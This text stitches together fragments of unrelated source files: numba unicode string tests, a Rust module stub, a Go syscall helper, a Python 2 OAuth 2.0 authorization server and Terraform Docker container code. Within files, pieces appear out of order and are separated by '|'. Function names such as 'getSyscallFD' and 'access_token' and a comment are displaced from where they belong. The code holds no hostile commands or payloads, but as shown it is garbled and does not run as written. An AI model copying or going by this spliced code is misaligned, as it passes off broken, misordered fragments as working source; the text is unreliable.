def test_concat(self, flags=no_pyobj_flags):
pyfunc = concat_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in UNICODE_EXAMPLES[::-1]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
"'%s' + '%s'?" % (a, b))
def test_split_exception_empty_sep(self):
self.disable_leak_check()
pyfunc = split_usecase
cfunc = njit(pyfunc)
# Handle empty separator exception
for func in [pyfunc, cfunc]:
with self.assertRaises(ValueError) as raises:
func('a', '')
self.assertIn('empty separator', str(raises.exception))
def test_split_exception_noninteger_maxsplit(self):
pyfunc = split_with_maxsplit_usecase
cfunc = njit(pyfunc)
| with self.assertRaises(TypingError) as raises:
cfunc('a', sep, 2.4)
self.assertIn('float64', str(raises.exception),
'non-integer maxsplit with sep = %s' % sep)
def test_split(self):
pyfunc = split_usecase
cfunc = njit(pyfunc)
CASES = [
(' a ', None),
('', '⚡'),
('abcabc', '⚡'),
('🐍⚡', '⚡'),
('🐍⚡🐍', '⚡'),
('abababa', 'a'),
('abababa', 'b'),
('abababa', 'c'),
('abababa', 'ab'),
('abababa', 'aba'),
]
for test_str, splitter in CASES:
self.assertEqual(pyfunc(test_str, splitter),
cfunc(test_str, splitter),
"'%s'.split('%s')?" % (test_str, splitter))
def test_split_with_maxsplit(self):
CASES = [
(' a ', None, 1),
('', '⚡', 1),
('abcabc', '⚡', 1),
('🐍⚡', '⚡', 1),
('🐍⚡🐍', '⚡', 1),
('abababa', 'a', 2),
('abababa', 'b', 1),
('abababa', 'c', 2),
('abababa', 'ab', 1),
('abababa', 'aba', 5),
]
for pyfunc, fmt_str in [(split_with_maxsplit_usecase, "'%s'.split('%s', %d)?"),
(split_with_maxsplit_kwarg_usecase, "'%s'.split('%s', maxsplit=%d)?")]:
cfunc = njit(pyfunc)
for test_str, splitter, maxsplit in CASES:
self.assertEqual(pyfunc(test_str, splitter, maxsplit),
cfunc(test_str, splitter, maxsplit),
fmt_str % (test_str, splitter, maxsplit))
def test_split_whitespace(self):
# explicit sep=None cases covered in test_split and test_split_with_maxsplit
pyfunc = split_whitespace_usecase
cfunc = njit(pyfunc)
#list copied from https://github.com/python/cpython/blob/master/Objects/unicodetype_db.h
all_whitespace = ''.join(map(chr, [
0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x001C, 0x001D, 0x001E, 0x001F, 0x0020,
0x0085, 0x00A0, 0x1680, 0x2000, 0x2001, 0x2002, 0x2003, 0x2004, 0x2005, 0x2006,
0x2007, 0x2008, 0x2009, 0x200A, 0x2028, 0x2029, 0x202F, 0x205F, 0x3000
]))
CASES = [
'',
'abcabc',
'🐍 ⚡',
'🐍 ⚡ 🐍',
'🐍 ⚡ 🐍 ',
' 🐍 ⚡ 🐍',
' 🐍' + all_whitespace + '⚡ 🐍 ',
]
for test_str in CASES:
self.assertEqual(pyfunc(test_str),
cfunc(test_str),
"'%s'.split()?" % (test_str,))
def test_join_empty(self):
# Can't pass empty list to nopython mode, so we have to make a
# separate test case
pyfunc = join_empty_usecase
cfunc = njit(pyfunc)
CASES = [
'',
'🐍🐍🐍',
]
for sep in CASES:
self.assertEqual(pyfunc(sep),
cfunc(sep),
"'%s'.join([])?" % (sep,))
def test_join_non_string_exception(self):
# Verify that join of list of integers raises typing exception
pyfunc = join_usecase
cfunc = njit(pyfunc)
# Handle empty separator exception
with self.assertRaises(TypingError) as raises:
cfunc('', [1,2,3])
# This error message is obscure, but indicates the error was trapped in typing of str.join()
# Feel free to change this as we update error messages.
exc_message = str(raises.exception)
self.assertIn("Invalid use of BoundFunction", exc_message)
self.assertIn("(reflected list(int", exc_message) # could be int32 or int64
def test_join(self):
pyfunc = join_usecase
cfunc = njit(pyfunc)
CASES = [
('', ['', '', '']),
('a', ['', '', '']),
('', ['a', 'bbbb', 'c']),
('🐍🐍🐍', ['⚡⚡'] * 5),
]
for sep, parts in CASES:
self.assertEqual(pyfunc(sep, parts),
cfunc(sep, parts),
"'%s'.join('%s')?" % (sep, parts))
def test_join_interleave_str(self):
# can pass a string as the parts iterable
pyfunc = join_usecase
cfunc = njit(pyfunc)
CASES = [
('abc', '123'),
('🐍🐍🐍', '⚡⚡'),
]
for sep, parts in CASES:
self.assertEqual(pyfunc(sep, parts),
cfunc(sep, parts),
"'%s'.join('%s')?" % (sep, parts))
def test_inplace_concat(self, flags=no_pyobj_flags):
pyfunc = inplace_concat_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in UNICODE_EXAMPLES[::-1]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
"'%s' + '%s'?" % (a, b))
def test_pointless_slice(self, flags=no_pyobj_flags):
def pyfunc(a):
return a[:]
cfunc = njit(pyfunc)
args = ['a']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_walk_backwards(self, flags=no_pyobj_flags):
def pyfunc(a):
return a[::-1]
cfunc = njit(pyfunc)
args = ['a']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_stride_slice(self, flags=no_pyobj_flags):
def pyfunc(a):
return a[::2]
cfunc = njit(pyfunc)
args = ['a']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_basic_lt(self, flags=no_pyobj_flags):
def pyfunc(a, b):
return a < b
cfunc = njit(pyfunc)
args = ['ab', 'b']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_basic_gt(self, flags=no_pyobj_flags):
def pyfunc(a, b):
return a > b
cfunc = njit(pyfunc)
args = ['ab', 'b']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_comparison(self):
def pyfunc(option, x, y):
if option == '==':
return x == y
elif option == '!=':
return x != y
elif option == '<':
return x < y
elif option == '>':
return x > y
elif option == '<=':
return x <= y
elif option == '>=':
return x >= y
else:
return None
cfunc = njit(pyfunc)
for x, y in permutations(UNICODE_ORDERING_EXAMPLES, r=2):
for cmpop in ['==', '!=', '<', '>', '<=', '>=', '']:
args = [cmpop, x, y]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_concat(self):
def pyfunc(x):
abc = 'abc'
if len(x):
return abc + 'b123' + x + 'IO'
else:
return x + abc + '123' + x
cfunc = njit(pyfunc)
args = ['x']
self.assertEqual(pyfunc(*args), cfunc(*args))
args = ['']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_literal_comparison(self):
def pyfunc(option):
x = 'a123'
y = 'aa12'
if option == '==':
return x == y
elif option == '!=':
return x != y
elif option == '<':
return x < y
elif option == '>':
return x > y
elif option == '<=':
return x <= y
elif option == '>=':
return x >= y
else:
return None
cfunc = njit(pyfunc)
for cmpop in ['==', '!=', '<', '>', '<=', '>=', '']:
args = [cmpop]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_len(self):
def pyfunc():
return len('abc')
cfunc = njit(pyfunc)
self.assertEqual(pyfunc(), cfunc())
def test_literal_getitem(self):
def pyfunc(which):
return 'abc'[which]
cfunc = njit(pyfunc)
for a in [-1, 0, 1, slice(1, None), slice(None, -1)]:
args = [a]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_in(self):
def pyfunc(x):
return x in '9876zabiuh'
cfunc = njit(pyfunc)
for a in ['a', '9', '1', '', '8uha', '987']:
args = [a]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_xyzwith(self):
def pyfunc(x, y):
return 'abc'.startswith(x), 'cde'.endswith(y)
cfunc = njit(pyfunc)
for args in permutations('abcdefg', r=2):
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_find(self):
def pyfunc(x):
return 'abc'.find(x), x.find('a')
cfunc = njit(pyfunc)
for a in ['ab']:
args = [a]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
@unittest.skipUnless(_py34_or_later,
'unicode support requires Python 3.4 or later')
class TestUnicodeInTuple(BaseTest):
def test_const_unicode_in_tuple(self):
# Issue 3673
@njit
def f():
return ('aa',) < ('bb',)
self.assertEqual(f.py_func(), f())
@njit
def f():
return ('cc',) < ('bb',)
self.assertEqual(f.py_func(), f())
def test_const_unicode_in_hetero_tuple(self):
@njit
def f():
return ('aa', 1) < ('bb', 1)
self.assertEqual(f.py_func(), f())
@njit
def f():
return ('aa', 1) < ('aa', 2)
self.assertEqual(f.py_func(), f())
if __name__ == '__main__':
unittest.main() | # Handle non-integer maxsplit exception
for sep in [' ', None]: |
lib.rs | pub mod agent; |
pub fn test() {
println!("Hello from lib!");
} | pub mod log;
#[cfg(test)]
mod test_util;
|
hijack_unix.go | //go:build !windows
// +build !windows
package testhelper
func | (fd uintptr) int {
return int(fd)
}
| getSyscallFD |
authorization_server.py | """OAuth 2.0 WSGI server middleware implements support for basic bearer
tokens and also X.509 certificates as access tokens
OAuth 2.0 Authorisation Server
"""
__author__ = "R B Wilkinson"
__date__ = "12/12/11"
__copyright__ = "(C) 2011 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "[email protected]"
__revision__ = "$Id$"
import json
import logging
import httplib
import urllib
from ndg.oauth.server.lib.access_token.make_access_token import \
make_access_token
from ndg.oauth.server.lib.oauth.access_token import (AccessTokenRequest,
ImplicitGrantAccessTokenResponse)
from ndg.oauth.server.lib.oauth.authorize import (AuthorizeRequest,
AuthorizeResponse)
from ndg.oauth.server.lib.oauth.oauth_exception import OauthException
from ndg.oauth.server.lib.register.access_token import AccessTokenRegister
from ndg.oauth.server.lib.register.authorization_grant import \
AuthorizationGrantRegister
log = logging.getLogger(__name__)
class AuthorizationServer(object):
"""
Provides the core OAuth 2.0 authorisation server functions.
"""
AUTHZ_HDR_ENV_KEYNAME = 'HTTP_AUTHORIZATION'
BEARER_TOK_ID = 'Bearer'
MAC_TOK_ID = 'MAC'
TOKEN_TYPES = (BEARER_TOK_ID, MAC_TOK_ID)
AUTHZ_CODE_RESP_TYPE = 'code'
TOK_RESP_TYPE = 'token'
RESP_TYPES = (AUTHZ_CODE_RESP_TYPE, TOK_RESP_TYPE)
def __init__(self, client_register, authorizer, client_authenticator,
resource_register, resource_authenticator,
access_token_generator, config):
"""Initialise the all the settings for an Authorisation server instance
"""
self.client_register = client_register
self.authorizer = authorizer
self.client_authenticator = client_authenticator
self.resource_register = resource_register
self.resource_authenticator = resource_authenticator
self.access_token_generator = access_token_generator
self.access_token_register = AccessTokenRegister(config)
self.authorization_grant_register = AuthorizationGrantRegister(config)
def authorize(self, request, client_authorized):
"""Handle an authorization request.
It is assumed that the caller has checked whether the user is
authenticated and that the user has authorised the client and scope.
Request query parameters (from
http://tools.ietf.org/html/draft-ietf-oauth-v2-22):
response_type
REQUIRED. Value MUST be set to "code" or "token" in the case
of an implicit grant.
client_id
REQUIRED. The client identifier as described in Section 2.2.
redirect_uri
OPTIONAL, as described in Section 3.1.2.
scope
OPTIONAL. The scope of the access request as described by
Section 3.3.
state
RECOMMENDED. An opaque value used by the client to maintain
state between the request and callback. The authorization
server includes this value when redirecting the user-agent back
to the client. The parameter SHOULD be used for preventing
cross-site request forgery as described in Section 10.12.
Response:
application/x-www-form-urlencoded format:
code
REQUIRED. The authorization code generated by the
authorization server. The authorization code MUST expire
shortly after it is issued to mitigate the risk of leaks. A
maximum authorization code lifetime of 10 minutes is
RECOMMENDED. The client MUST NOT use the authorization code
more than once. If an authorization code is used more than
once, the authorization server MUST deny the request and SHOULD
attempt to revoke all tokens previously issued based on that
authorization code. The authorization code is bound to the
client identifier and redirection URI.
state
REQUIRED if the "state" parameter was present in the client
authorization request. The exact value received from the
client.
@type request: webob.Request
@param request: HTTP request object
@type client_authorized: bool
@param client_authorized: True if resource owner has authorized client
@rtype: tuple: (str, int, str)
@return: tuple (
redirect_uri
HTTP status if error
error description
)
"""
log.debug("Starting authorization request")
# Parameters should only be taken from the query string.
params = request.GET
authz_request = AuthorizeRequest(params.get('response_type', None),
params.get('client_id', None),
params.get('redirect_uri', None),
params.get('scope', None),
params.get('state', None))
try:
self.check_request(request, params, post_only=False)
# Check for required parameters.
required_parameters = ['response_type', 'client_id']
for param in required_parameters:
if param not in params:
log.error("Missing request parameter %s from params: %s",
param, params)
raise OauthException('invalid_request',
"Missing request parameter: %s" % param)
if not client_authorized:
raise OauthException('access_denied',
'User has declined authorization')
client_error = self.client_register.is_valid_client(
authz_request.client_id,
authz_request.redirect_uri)
if client_error:
log.error("Invalid client: %s", client_error)
return (None, httplib.BAD_REQUEST, client_error)
# redirect_uri must be included in the request if the client has
# more than one registered.
client = self.client_register.register[authz_request.client_id]
if (len(client.redirect_uris) != 1 and
not authz_request.redirect_uri):
log.error("An authorization request has been made without a "
"return URI")
return (None,
httplib.BAD_REQUEST,
('An authorization request has been made without a '
'return URI.'))
response_type = params.get('response_type', None)
# Response may be an authorisation code or in the case of an
# Implicit Grant a token
if response_type == self.__class__.AUTHZ_CODE_RESP_TYPE:
log.debug('Client requesting an authorization code')
# Preconditions satisfied - generate grant.
grant, code = self.authorizer.generate_authorization_grant(
authz_request,
request)
authz_response = AuthorizeResponse(code, authz_request.state)
if not self.authorization_grant_register.add_grant(grant):
log.error('Registering grant failed')
raise OauthException('server_error',
'Authorization grant could not be '
'created')
log.debug("Redirecting back after successful authorization.")
return self._redirect_after_authorize(authz_request,
authz_response)
elif response_type == self.__class__.TOK_RESP_TYPE:
log.debug('Implicit Grant - client requesting a token')
impl_grant_response = make_access_token(authz_request,
self.access_token_register,
self.access_token_generator)
log.debug("Redirecting back after successful implicit grant.")
return self._redirect_after_authorize(authz_request,
impl_grant_response)
else:
raise OauthException('unsupported_response_type',
"Response type %s not supported" %
response_type)
except OauthException, exc:
log.error("Redirecting back after error: %s - %s",
exc.error, exc.error_description)
return self._redirect_after_authorize(authz_request, None,
exc.error,
exc.error_description)
def _redirect_after_authorize(self,
authz_request,
authz_response=None,
error=None,
error_description=None):
"""Redirects to the redirect URI after the authorization process as
completed.
@type resp: ndg.oauth.server.lib.oauth.authorize.AuthorizeRequest
@param resp: OAuth authorize request
@type resp: ndg.oauth.server.lib.oauth.authorize.AuthorizeResponse
@param resp: OAuth authorize response
@type error: str
@param error: OAuth error
@type error_description: str
@param error_description: error description
"""
# Check for inconsistencies that should be reported directly to the user.
if not authz_response and not error:
error = 'server_error'
error_description = 'Internal server error'
# Get the redirect URI.
client = self.client_register.register[authz_request.client_id]
redirect_uri = (
authz_request.redirect_uri if authz_request.redirect_uri else \
client.redirect_uris[0]
)
if not redirect_uri:
return (
None,
httplib.BAD_REQUEST,
'An authorization request has been made without a return URI.')
# Redirect back to client with authorization code or error.
if error:
url_parameters = [('error', error),
('error_description', error_description)]
elif isinstance(authz_response, AuthorizeResponse):
url_parameters = [('code', authz_response.code)]
elif isinstance(authz_response, ImplicitGrantAccessTokenResponse):
url_parameters = authz_response.get_as_dict().items()
else:
raise OauthException('Expecting authorisation response or implicit '
'grant response, got %r' % authz_response)
full_redirect_uri = self._make_combined_url(redirect_uri,
url_parameters,
authz_request.state)
log.debug("Redirecting to URI: %s", full_redirect_uri)
return full_redirect_uri, None, None
@staticmethod
def _make_combined_url(base_url, parameters, state):
"""Constructs a URL from a base URL and parameters to be included in a
query string.
@type base_url: str
@param base_url: base URL to which to add query parameters
@type parameters: dict
@param parameters: parameter names and values
@type state: str
@param state: OAuth state parameter value, which should not be URL
encoded
@rtype: str
@return: full URL
"""
url = base_url.rstrip('?')
url_parts = [url]
sep_with_ampersand = ('?' in url)
if parameters:
query_string = urllib.urlencode(parameters)
url_parts.extend([('&' if (sep_with_ampersand) else '?'),
query_string])
sep_with_ampersand = True
if state:
url_parts.extend([('&' if (sep_with_ampersand) else '?'),
'state=',
state])
return ''.join(url_parts)
def | (self, request):
"""
Handles a request for an access token.
Request parameters in post data (from
http://tools.ietf.org/html/draft-ietf-oauth-v2-22):
The client makes a request to the token endpoint by adding the
following parameters using the "application/x-www-form-urlencoded"
format in the HTTP request entity-body:
grant_type
REQUIRED. Value MUST be set to "authorization_code".
code
REQUIRED. The authorization code received from the
authorization server.
redirect_uri
REQUIRED, if the "redirect_uri" parameter was included in the
authorization request as described in Section 4.1.1, and their
values MUST be identical.
Response:
application/json format:
access_token
access token
token_type
token type
expires_in
lifetime of token in seconds
refresh_token
@type request: webob.Request
@param request: HTTP request object
@rtype: tuple: (str, int, str)
@return: tuple (
OAuth JSON response
HTTP status if error
error description
)
"""
log.debug("Starting access token request")
error_status = None
try:
# Parameters should only be taken from the body, not the URL query
# string.
params = request.POST
self.check_request(request, params, post_only=True)
# Check that the client is authenticated as a registered client.
client_id = self.client_authenticator.authenticate(request)
if client_id is None:
log.warn('Client authentication not performed')
error_status = httplib.FORBIDDEN
else:
log.debug("Client id: %s", client_id)
# redirect_uri is only required if it was included in the
# authorization request.
required_parameters = ['grant_type', 'code']
for param in required_parameters:
if param not in params:
log.error("Missing request parameter %s from inputs: %s",
param, params)
raise OauthException(
'invalid_request',
"Missing request parameter: %s" % param)
except OauthException, exc:
# Assume client error
if error_status is None:
error_status = httplib.BAD_REQUEST
return (self._error_access_token_response(exc.error,
exc.error_description),
error_status, exc.error_description)
token_request = AccessTokenRequest(params.get('grant_type', None),
params.get('code', None),
params.get('redirect_uri', None))
try:
response = make_access_token(
token_request, client_id, self.access_token_register,
self.access_token_generator, self.authorization_grant_register)
except OauthException, exc:
return (self._error_access_token_response(exc.error,
exc.error_description),
None, exc.error_description)
if response:
return self._access_token_response(response), None, None
else:
return (None, httplib.INTERNAL_SERVER_ERROR,
'Access token generation failed.')
def _access_token_response(self, resp):
"""Constructs the JSON response to an access token request.
@type resp: ndg.oauth.server.lib.oauth.access_token.AccessTokenResponse
@param resp: OAuth access token response
@rtype: str
@return JSON formatted response
"""
log.debug("Responding successfully with access token.")
content_dict = resp.get_as_dict()
content = json.dumps(content_dict)
return content
def _error_access_token_response(self, error, error_description):
"""Constructs an error JSON response to an access token request.
@type error: str
@param error: OAuth error
@type error_description: str
@param error_description: error description
@rtype: str
@return JSON formatted response
"""
log.error("Responding with error: %s - %s", error, error_description)
error_dict = {'error': error}
if error_description:
error_dict['error_description'] = error_description
error_content = json.dumps(error_dict)
return error_content
def check_request(self, request, params, post_only=False):
"""
Checks that the request is valid in the following respects:
o Must be over HTTPS.
o Optionally, must use the POST method.
o Parameters must not be repeated.
If the request is directly from the client, the user must be
authenticated - it is assumed that the caller has checked this.
Raises OauthException if any check fails.
@type request: webob.Request
@param request: HTTP request object
@type params: dict
@param params: request parameters
@type post_only: bool
@param post_only: True if the HTTP method must be POST, otherwise False
"""
if request.scheme != 'https':
raise OauthException('invalid_request',
'Transport layer security must be used for '
'this request.')
if post_only and request.method != 'POST':
raise OauthException('invalid_request',
'HTTP POST method must be used for this '
'request.')
# Check for duplicate parameters.
param_counts = {}
for key in params.iterkeys():
count = param_counts.get(key, 0)
param_counts[key] = count + 1
for key, count in param_counts.iteritems():
if count > 1:
raise OauthException('invalid_request',
'Parameter "%s" is repeated.' % key)
def check_token(self, request, scope=None):
"""
Simple service that could be used to validate bearer tokens. It would
be called from a resource service that trusts this authorization
service. This is not part of the OAuth specification.
Only POST parameters are accepted in the request, to avoid logging
and caching of access tokens.
Request parameters
access_token
REQUIRED. Bearer token
scope
OPTIONAL. Scope
Response:
application/json format:
status
HTTP status indicating the access control decision
user_name
user identifier corresponding to access token
error
error as described in
http://tools.ietf.org/html/draft-ietf-oauth-v2-22#section-5.2
@type request: webob.Request
@param request: HTTP request object
@type scope: str
@param scope: required scope
@rtype: tuple: (str, int, str)
@return: tuple (
OAuth JSON response
HTTP status
error description
)
"""
# only allow POST params to avoid logging and caching of access tokens
params = request.POST
# Check that the client is authenticated as a registered client.
resource_id = self.resource_authenticator.authenticate(request)
if resource_id is None:
log.warn('Resource authentication not performed')
else:
log.debug("Resource id: %s", resource_id)
# Retrieve access token
if 'access_token' not in params:
error = 'invalid_request'
else:
access_token = params['access_token']
if scope:
required_scope = scope
else:
required_scope = params.get('scope', None)
token, error = self.access_token_register.get_token(access_token,
required_scope)
# Formulate response
status = {'invalid_request': httplib.BAD_REQUEST,
'invalid_token': httplib.FORBIDDEN,
None: httplib.OK}.get(error, httplib.BAD_REQUEST)
content_dict = {'status': status}
if error:
content_dict['error'] = error
else:
# TODO only get additional data when resource is allowed to
content_dict['user_name'] = token.grant.additional_data.get('user_identifier')
content = json.dumps(content_dict)
return (content, status, error)
def get_registered_token(self, request, scope=None):
"""
Checks that a token in the request is valid. It would
be called from a resource service that trusts this authorization
service.
Request parameters:
set in Authorization header (OAuth spec., Section 7.1 Access
Token Types
token type: Bearer or MAC
access token: access token to obtain access
Response:
application/json format:
status
HTTP status indicating the access control decision
error
error as described in
http://tools.ietf.org/html/draft-ietf-oauth-v2-22#section-5.2
@type request: webob.Request
@param request: HTTP request object
@type scope: str
@param scope: required scope
@rtype: tuple: (str, int, str)
@return: tuple (
access token
HTTP status
error description
)
"""
authorization_hdr = request.environ.get(
self.__class__.AUTHZ_HDR_ENV_KEYNAME)
if authorization_hdr is None:
log.error('No Authorization header present for request to %r',
request.path_url)
error = 'invalid_request'
token = None
else:
authorization_hdr_parts = authorization_hdr.split()
if len(authorization_hdr_parts) < 2:
log.error('Expecting at least two Authorization header '
'elements for request to %r; '
'header is: %r', request.path_url, authorization_hdr)
error = 'invalid_request'
token_type, access_token = authorization_hdr_parts[:2]
# Currently only supports bearer type tokens
if token_type != self.__class__.BEARER_TOK_ID:
log.error('Token type retrieved is %r, expecting "Bearer" '
'type for request to %r', token_type)
error = 'invalid_request'
else:
token, error = self.access_token_register.get_token(
access_token,
scope)
status = {'invalid_request': httplib.BAD_REQUEST,
'invalid_token': httplib.FORBIDDEN,
'insufficient_scope': httplib.FORBIDDEN,
None: httplib.OK}.get(error, httplib.BAD_REQUEST)
return token, status, error
def is_registered_client(self, request):
"""Determines whether the client ID in the request is registered.
@type request: WebOb.request
@param request: request
@rtype: tuple (basestring, basestring) or (NoneType, NoneType)
@return: (error, error description) or None if client ID is found and
registered
"""
client_id = request.params.get('client_id', None)
if not client_id:
return 'invalid_request', 'Missing request parameter: client_id'
else:
error_description = self.client_register.is_registered_client(
client_id)
if error_description:
return 'unauthorized_client', error_description
return None, None
| access_token |
resource_docker_container_funcs.go | package docker
import (
"archive/tar"
"bytes"
"errors"
"fmt"
"strconv"
"time"
dc "github.com/fsouza/go-dockerclient"
"github.com/hashicorp/terraform/helper/schema"
)
var (
creationTime time.Time
)
func resourceDockerContainerCreate(d *schema.ResourceData, meta interface{}) error {
var err error
client := meta.(*dc.Client)
var data Data
if err := fetchLocalImages(&data, client); err != nil {
return err
}
image := d.Get("image").(string)
if _, ok := data.DockerImages[image]; !ok {
if _, ok := data.DockerImages[image+":latest"]; !ok {
return fmt.Errorf("Unable to find image %s", image)
}
image = image + ":latest"
}
// The awesome, wonderful, splendiferous, sensical
// Docker API now lets you specify a HostConfig in
// CreateContainerOptions, but in my testing it still only
// actually applies HostConfig options set in StartContainer.
// How cool is that?
createOpts := dc.CreateContainerOptions{
Name: d.Get("name").(string),
Config: &dc.Config{
Image: image,
Hostname: d.Get("hostname").(string),
Domainname: d.Get("domainname").(string),
},
}
if v, ok := d.GetOk("env"); ok {
createOpts.Config.Env = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("command"); ok {
createOpts.Config.Cmd = stringListToStringSlice(v.([]interface{}))
for _, v := range createOpts.Config.Cmd {
if v == "" {
return fmt.Errorf("values for command may not be empty")
}
}
}
if v, ok := d.GetOk("entrypoint"); ok {
createOpts.Config.Entrypoint = stringListToStringSlice(v.([]interface{}))
}
if v, ok := d.GetOk("user"); ok {
createOpts.Config.User = v.(string)
}
exposedPorts := map[dc.Port]struct{}{}
portBindings := map[dc.Port][]dc.PortBinding{}
if v, ok := d.GetOk("ports"); ok {
exposedPorts, portBindings = portSetToDockerPorts(v.(*schema.Set))
}
if len(exposedPorts) != 0 {
createOpts.Config.ExposedPorts = exposedPorts
}
extraHosts := []string{}
if v, ok := d.GetOk("host"); ok {
extraHosts = extraHostsSetToDockerExtraHosts(v.(*schema.Set))
}
volumes := map[string]struct{}{}
binds := []string{}
volumesFrom := []string{}
if v, ok := d.GetOk("volumes"); ok {
volumes, binds, volumesFrom, err = volumeSetToDockerVolumes(v.(*schema.Set))
if err != nil {
return fmt.Errorf("Unable to parse volumes: %s", err)
}
}
if len(volumes) != 0 {
createOpts.Config.Volumes = volumes
}
if v, ok := d.GetOk("labels"); ok {
createOpts.Config.Labels = mapTypeMapValsToString(v.(map[string]interface{}))
}
hostConfig := &dc.HostConfig{
Privileged: d.Get("privileged").(bool),
PublishAllPorts: d.Get("publish_all_ports").(bool),
RestartPolicy: dc.RestartPolicy{
Name: d.Get("restart").(string),
MaximumRetryCount: d.Get("max_retry_count").(int),
},
LogConfig: dc.LogConfig{
Type: d.Get("log_driver").(string),
},
}
if len(portBindings) != 0 {
hostConfig.PortBindings = portBindings
}
if len(extraHosts) != 0 {
hostConfig.ExtraHosts = extraHosts
}
if len(binds) != 0 {
hostConfig.Binds = binds
}
if len(volumesFrom) != 0 {
hostConfig.VolumesFrom = volumesFrom
}
if v, ok := d.GetOk("dns"); ok {
hostConfig.DNS = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("dns_opts"); ok {
hostConfig.DNSOptions = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("dns_search"); ok {
hostConfig.DNSSearch = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("links"); ok {
hostConfig.Links = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("memory"); ok {
hostConfig.Memory = int64(v.(int)) * 1024 * 1024
}
if v, ok := d.GetOk("memory_swap"); ok {
swap := int64(v.(int))
if swap > 0 {
swap = swap * 1024 * 1024
}
hostConfig.MemorySwap = swap
}
if v, ok := d.GetOk("cpu_shares"); ok {
hostConfig.CPUShares = int64(v.(int))
}
if v, ok := d.GetOk("log_opts"); ok {
hostConfig.LogConfig.Config = mapTypeMapValsToString(v.(map[string]interface{}))
}
if v, ok := d.GetOk("network_mode"); ok {
hostConfig.NetworkMode = v.(string)
}
createOpts.HostConfig = hostConfig
var retContainer *dc.Container
if retContainer, err = client.CreateContainer(createOpts); err != nil {
return fmt.Errorf("Unable to create container: %s", err)
}
if retContainer == nil {
return fmt.Errorf("Returned container is nil")
}
d.SetId(retContainer.ID)
if v, ok := d.GetOk("networks"); ok {
connectionOpts := dc.NetworkConnectionOptions{Container: retContainer.ID}
for _, rawNetwork := range v.(*schema.Set).List() {
network := rawNetwork.(string)
if err := client.ConnectNetwork(network, connectionOpts); err != nil {
return fmt.Errorf("Unable to connect to network '%s': %s", network, err)
}
}
}
if v, ok := d.GetOk("upload"); ok {
for _, upload := range v.(*schema.Set).List() {
content := upload.(map[string]interface{})["content"].(string)
file := upload.(map[string]interface{})["file"].(string)
buf := new(bytes.Buffer)
tw := tar.NewWriter(buf)
hdr := &tar.Header{
Name: file,
Mode: 0644,
Size: int64(len(content)),
}
if err := tw.WriteHeader(hdr); err != nil {
return fmt.Errorf("Error creating tar archive: %s", err)
}
if _, err := tw.Write([]byte(content)); err != nil {
return fmt.Errorf("Error creating tar archive: %s", err)
}
if err := tw.Close(); err != nil {
return fmt.Errorf("Error creating tar archive: %s", err)
}
uploadOpts := dc.UploadToContainerOptions{
InputStream: bytes.NewReader(buf.Bytes()),
Path: "/",
}
if err := client.UploadToContainer(retContainer.ID, uploadOpts); err != nil {
return fmt.Errorf("Unable to upload volume content: %s", err)
}
}
}
creationTime = time.Now()
if err := client.StartContainer(retContainer.ID, nil); err != nil {
return fmt.Errorf("Unable to start container: %s", err)
}
return resourceDockerContainerRead(d, meta)
}
func resourceDockerContainerRead(d *schema.ResourceData, meta interface{}) error {
client := meta.(*dc.Client)
apiContainer, err := fetchDockerContainer(d.Id(), client)
if err != nil {
return err
}
if apiContainer == nil {
// This container doesn't exist anymore
d.SetId("")
return nil
}
var container *dc.Container
loops := 1 // if it hasn't just been created, don't delay
if !creationTime.IsZero() {
loops = 30 // with 500ms spacing, 15 seconds; ought to be plenty
}
sleepTime := 500 * time.Millisecond
for i := loops; i > 0; i-- {
container, err = client.InspectContainer(apiContainer.ID)
if err != nil {
return fmt.Errorf("Error inspecting container %s: %s", apiContainer.ID, err)
}
if container.State.Running ||
!container.State.Running && !d.Get("must_run").(bool) {
break
}
if creationTime.IsZero() { // We didn't just create it, so don't wait around
return resourceDockerContainerDelete(d, meta)
}
if container.State.FinishedAt.After(creationTime) {
// It exited immediately, so error out so dependent containers
// aren't started
resourceDockerContainerDelete(d, meta)
return fmt.Errorf("Container %s exited after creation, error was: %s", apiContainer.ID, container.State.Error)
}
time.Sleep(sleepTime)
}
// Handle the case of the for loop above running its course
if !container.State.Running && d.Get("must_run").(bool) {
resourceDockerContainerDelete(d, meta)
return fmt.Errorf("Container %s failed to be in running state", apiContainer.ID)
}
// Read Network Settings
if container.NetworkSettings != nil {
d.Set("ip_address", container.NetworkSettings.IPAddress)
d.Set("ip_prefix_length", container.NetworkSettings.IPPrefixLen)
d.Set("gateway", container.NetworkSettings.Gateway)
d.Set("bridge", container.NetworkSettings.Bridge)
}
return nil
}
func resourceDockerContainerUpdate(d *schema.ResourceData, meta interface{}) error {
return nil
}
func resourceDockerContainerDelete(d *schema.ResourceData, meta interface{}) error {
client := meta.(*dc.Client)
// Stop the container before removing if destroy_grace_seconds is defined
if d.Get("destroy_grace_seconds").(int) > 0 {
var timeout = uint(d.Get("destroy_grace_seconds").(int))
if err := client.StopContainer(d.Id(), timeout); err != nil {
return fmt.Errorf("Error stopping container %s: %s", d.Id(), err)
}
}
